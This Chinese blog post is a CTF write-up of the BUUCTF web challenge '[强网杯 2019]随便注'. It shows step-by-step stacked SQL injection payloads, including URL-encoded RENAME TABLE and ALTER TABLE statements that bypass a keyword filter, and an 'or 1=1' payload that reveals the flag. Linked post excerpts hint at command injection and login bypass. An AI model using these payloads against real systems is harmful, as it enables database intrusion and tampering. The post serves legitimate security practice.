当前位置:首页 > CTF > BUU > 正文内容

BUUCTF_web_第二题:[强网杯 2019]随便注

七星4年前 (2021-01-21)BUU1817

第二题: [强网杯 2019]随便注

测试一下, 1'# 返回正常, 发现是字符注入,尝试show一下database:

1';show databases;%23

发现出结果了:

得到了所有的数据库, 那就再看看当前使用的数据库中有哪些表喽:

?inject=1';show tables;%23

两个表, 分别看看里面有啥:

?inject=1';show columns from `1919810931114514`;%23

?inject=1';show columns from `words`;%23

默认查询的是worlds, 但是flag在一串数字的表里面, 所以我们可以select一下, 但是发现:

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

他过滤了一堆东西.

所以思路就有了, 尝试一下堆叠注入, 可以, 所以我们就构造下面的payload:

1%27%3BRENAME+TABLE+%60words%60+TO+%60words1%60%3BRENAME+TABLE+%601919810931114514%60+TO+%60words%60%3BALTER+TABLE+%60words%60+CHANGE+%60flag%60+%60id%60+VARCHAR%28100%29+CHARACTER+SET+utf8+COLLATE+utf8_general_ci+NOT+NULL%3Bshow+columns+from+words%3B%2523

读一下也简单,

1';
RENAME  TABLE  `words`  TO  `words1`;
RENAME  TABLE  `1919810931114514`  TO  `words`;
ALTER  TABLE  `words`  CHANGE  `flag`  `id`  VARCHAR(100)  CHARACTER  SET  utf8  COLLATE  utf8_general_ci  NOT  NULL;
show  columns  from  words;
%23 

 先把 words表名改为 words1,再把一串数字表改为words,然后把新的 words 表里的 flag 列名改为 id ,这样就可以直接查询 flag 了:

1%27+or+%271%27%3D%271

直接获得弗拉格.

七星比特|qixingbit.com

相关文章

BUUCTF_web_第一题: [HCTF 2018]WarmUp

BUUCTF_web_第一题: [HCTF 2018]WarmUp

第一题: [HCTF 2018]WarmUp f12, 注释里有个文件, 访问, 成功获得审计代码. 审计代码里有个hint.php, 打开, 成功获得ffffllllaaaagggg,...

BUUCTF_web_第四题:[极客大挑战 2019]Havefun

BUUCTF_web_第四题:[极客大挑战 2019]Havefun

开局一直猫, flag全靠f12:<!--˂!----˃$cat=$_GET['cat'];echo $cat;if($cat=='dog'){    echo 'Syc{c...

BUUCTF_web_第七题:[极客大挑战 2019]Secret File

BUUCTF_web_第七题:[极客大挑战 2019]Secret File

f12, 获得Archive_room.php访问, 嗯, 他说什么什么快没看清, 不要紧, 我们可以让他慢下来开burpsuite, 抓取回显包, 得到secr3t.php访问,成功获得源码high...

BUUCTF_web_第八题:[极客大挑战 2019]LoveSQL

BUUCTF_web_第八题:[极客大挑战 2019]LoveSQL

打开之后, 和之前的类似, 万能密码 1' or 1=1#登录成功,给了一个admin和一串md5, md5解密失败.只能常规注入了.给了个灵魂试探:用 sqlmap 是没有灵魂的那就手工注入一下,巩...

BUUCTF_web_第九题:[GXYCTF2019]Ping Ping Ping

BUUCTF_web_第九题:[GXYCTF2019]Ping Ping Ping

是个ping, 传入/?ip=127.0.0.1看看命令执行, 立刻想到||管道符:/?ip=127.0.0.1||ls不行, 那就封号;/?ip=127.0.0.1;ls成功获得两个文件名flag....

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。